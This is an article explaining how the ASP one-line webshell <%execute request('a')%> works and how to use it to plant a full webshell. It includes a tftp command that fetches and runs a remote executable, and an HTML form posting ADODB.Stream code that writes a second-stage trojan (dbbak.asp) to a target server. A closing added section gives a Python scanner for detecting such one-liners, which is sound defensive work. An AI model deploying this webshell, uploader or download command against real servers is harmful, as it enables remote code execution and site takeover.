ASP one-line trojan: analysis of how it works

Source: Internet
Author: User

Access via HTTP protocol
Scenarios where a one-line trojan is used (I list only two):

1. Database-backup-only scenarios
When the database is backed up as an ASP file, the error "compile error, missing script close tag %>" does not appear.

2. SA privileges: usually a one-line trojan is written first, for convenience. (Of course, uploading a "pigeon" directly over tftp and running it is quicker.)

tftp -i IP get Server.exe


How the one-line trojan <%execute request("a")%> works:

First, you need to know the Execute() function, which executes ASP code. It is responsible for running the trojan we upload, which is parsed by asp.dll. The code <%execute request("a")%> above can be explained like this:

<%
If Request("a") <> "" Then Execute Request("a")
%>

It executes if a is not empty. Executes what? ...

If a != 0

Now let's take a look at the client:

<form action="http://192.168.0.28/shell.asp" method="post">
<textarea name="a" cols="120" rows="10" width="45">
Set lp = Server.CreateObject("ADODB.Stream") ' creates the ADODB.Stream component ...
lp.Open
lp.Type = 2
lp.Charset = "gb2312"
lp.WriteText Request("p")
lp.SaveToFile Server.MapPath("dbbak.asp"), 2
lp.Close
Set lp = Nothing
Response.Redirect "dbbak.asp"
</textarea>
<textarea name="p" cols="120" rows="10" width="45">data to be submitted</textarea><br><center><br>
<input type="submit" value="Submit">
</center>
</form>


ADODB.Stream is responsible for writing data to the server and reading it back:

Component: "ADODB.Stream"
The following methods are available:

Cancel method
Usage:
Object.Cancel
Description: Cancels a pending asynchronous Execute or Open method call.

WriteText method
Usage:
Object.WriteText(Data, [Options])
Description: Writes the specified text data into the object.
Parameter description: Data is the content to be written.
Options is the write option; it may be omitted. The possible values are as follows:
adWriteChar = 0
adWriteLine = 1

SaveToFile method
Usage:
Object.SaveToFile(FileName, [Options])
Description: Writes the contents of the object to the file specified by FileName.

That is, the name under which we save the trojan: dbbak.asp
Parameter description: FileName is the specified file.
Options is the save option; it may be omitted. The possible values are as follows:
adSaveCreateNotExist = 1
adSaveCreateOverWrite = 2

Once the one-line trojan is in place, the value of a is empty and it waits for a value to be written. When http://www.***.com/**.asp is accessed, it is simply waiting, ready to execute with the Execute() function ...

An ADODB.Stream is created to write our big horse (the full-featured trojan) to the server ...

At the same time, the SaveToFile method of this component sets the file name of our big horse: dbbak.asp

When the form is submitted to the server, the value of a is found to be non-empty, so Execute() runs it and our big horse is executed!
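
Added example (not from the original article): a defensive scan for the construct analysed above, Execute/Eval applied directly to Request input inside a <% %> block, including the database-backup case where the script sits inside a mostly binary file. The function names, the extensions scanned and the sample data are assumptions made for illustration.

```python
import os
import re

# Sink: Execute / ExecuteGlobal / Eval fed straight from the Request collection.
# ASP tolerates the extra whitespace seen in `execute request ("a")`.
SINK = re.compile(
    rb'\b(execute(?:global)?|eval)\s*\(?\s*request\s*'
    rb'(?:\.\s*(?:form|querystring|item)\s*)?\(\s*"([^"]*)"',
    re.IGNORECASE,
)
# Script blocks; a block with no closing %> is taken to run to end of file.
BLOCK = re.compile(rb"<%(.*?)(?:%>|\Z)", re.DOTALL)


def find_one_liners(data: bytes) -> list[tuple[str, str]]:
    """Return (function, request_key) for each sink inside a <% %> block."""
    # Raw bytes are scanned so that a database backup saved with an .asp
    # extension (binary, with script text embedded in a record) is covered.
    hits = []
    for block in BLOCK.finditer(data):
        for m in SINK.finditer(block.group(1)):
            hits.append((m.group(1).decode().lower(), m.group(2).decode("latin-1")))
    return hits


def scan_tree(root: str) -> dict[str, list[tuple[str, str]]]:
    """Scan every .asp/.asa file under root; return only files with hits."""
    report = {}
    for folder, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith((".asp", ".asa")):
                path = os.path.join(folder, name)
                with open(path, "rb") as fh:
                    hits = find_one_liners(fh.read())
                if hits:
                    report[path] = hits
    return report


# Constructed samples (not captured from a real system).
ONE_LINER = b'<%execute request ("a")%>'
DB_BACKUP = b"\x00\x01\x00\x00Standard Jet DB\x00" + bytes(range(256)) + ONE_LINER + b"\x00" * 32
BENIGN = b'<% Response.Write Server.HTMLEncode(Request("a")) %>'

if __name__ == "__main__":
    for label, sample in [("one-liner", ONE_LINER), ("db backup", DB_BACKUP), ("benign", BENIGN)]:
        print(label, find_one_liners(sample))
```

A hit means a script block hands client input to the interpreter; such files should be reviewed along with whatever process wrote them into the web root.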